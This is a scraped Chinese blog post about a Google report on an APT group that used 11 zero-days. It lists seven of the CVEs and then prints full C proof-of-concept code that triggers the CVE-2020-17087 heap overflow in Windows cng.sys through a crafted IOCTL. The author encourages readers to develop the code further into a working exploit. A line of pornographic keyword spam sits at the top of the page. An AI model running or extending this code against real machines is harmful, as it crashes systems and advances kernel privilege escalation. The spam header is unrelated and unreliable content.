日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

Google: Sophisticated APT Group Burned 11 Zero-Days in Mass Spying Operation

發布時間:2024/3/13 编程问答 44 豆豆
生活随笔 收集整理的這篇文章主要介紹了 Google: Sophisticated APT Group Burned 11 Zero-Days in Mass Spying Operation 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

神秘黑客組織利用11個0 day漏洞發起攻擊

多的我也懶得寫,寫幾個信息點。自己拓展去。


CVE-2020-15999 - Chrome Freetype堆緩存溢出漏洞;

CVE-2020-17087 - Windows cng.sys中的堆緩存溢出漏洞;

CVE-2020-16009 - TurboFan map deprecation中的Chrome type confusion

CVE-2020-16010 – Chrome安卓版堆緩存溢出漏洞

CVE-2020-27930 - Safari 任意棧讀寫漏洞

CVE-2020-27950 - iOS XNU kernel 內存泄露漏洞

CVE-2020-27932 - iOS kernel type confusion with turnstiles

吐槽:放著這不搞,搞那些啥亂七八糟的東西…
windows: CVE-2020-17087的poc就放在這,有興趣接著往下搞。

#pragma comment(lib, "ntdll")#include <cstdio> #include <windows.h>int main() {HANDLE hCng = CreateFileA("\\\\.\\GLOBALROOT\\Device\\Cng",GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);if (hCng == NULL) {printf("[-] Failed to open \\Device\\Cng: %u\n", GetLastError());return 1;}printf("[+] \\Device\\Cng opened, handle: %p\n", hCng);//// DataBufferSize overflows when used for allocating memory in// cng!CfgAdtpFormatPropertyBlock as (uint16)(DataBufferSize * 6).//// In this proof-of-concept, an allocation of (uint16)(0x2AAB * 6) = 2// bytes is requested while 0x2AAB * 6 = 0x10002 bytes are written to it.//CONST DWORD DataBufferSize = 0x2AAB;CONST DWORD IoctlSize = 4096 + DataBufferSize;BYTE *IoctlData = (BYTE *)HeapAlloc(GetProcessHeap(), 0, IoctlSize);RtlZeroMemory(IoctlData, IoctlSize);*(DWORD*) &IoctlData[0x00] = 0x1A2B3C4D;*(DWORD*) &IoctlData[0x04] = 0x10400;*(DWORD*) &IoctlData[0x08] = 1;*(ULONGLONG*)&IoctlData[0x10] = 0x100;*(DWORD*) &IoctlData[0x18] = 3;*(ULONGLONG*)&IoctlData[0x20] = 0x200;*(ULONGLONG*)&IoctlData[0x28] = 0x300;*(ULONGLONG*)&IoctlData[0x30] = 0x400;*(DWORD*) &IoctlData[0x38] = 0;*(ULONGLONG*)&IoctlData[0x40] = 0x500;*(ULONGLONG*)&IoctlData[0x48] = 0x600;*(DWORD*) &IoctlData[0x50] = DataBufferSize; // OVERFLOW*(ULONGLONG*)&IoctlData[0x58] = 0x1000;*(ULONGLONG*)&IoctlData[0x60] = 0;RtlCopyMemory(&IoctlData[0x200], L"FUNCTION", 0x12);RtlCopyMemory(&IoctlData[0x400], L"PROPERTY", 0x12);ULONG_PTR OutputBuffer = 0;DWORD BytesReturned;BOOL Status = DeviceIoControl(hCng,0x390400,IoctlData,IoctlSize,&OutputBuffer,sizeof(OutputBuffer),&BytesReturned,NULL);printf("[+] Ioctl sent, Status: %d, OutputBuffer: %zx\n", Status, OutputBuffer);HeapFree(GetProcessHeap(), 0, IoctlData);CloseHandle(hCng);return 0; }

不建議使用BCrypt,寫成功10個有9個還是藍屏,1個還是編不過。建議沿著原作者的思路走,最起碼他成功了。

總結

以上是生活随笔為你收集整理的Google: Sophisticated APT Group Burned 11 Zero-Days in Mass Spying Operation的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。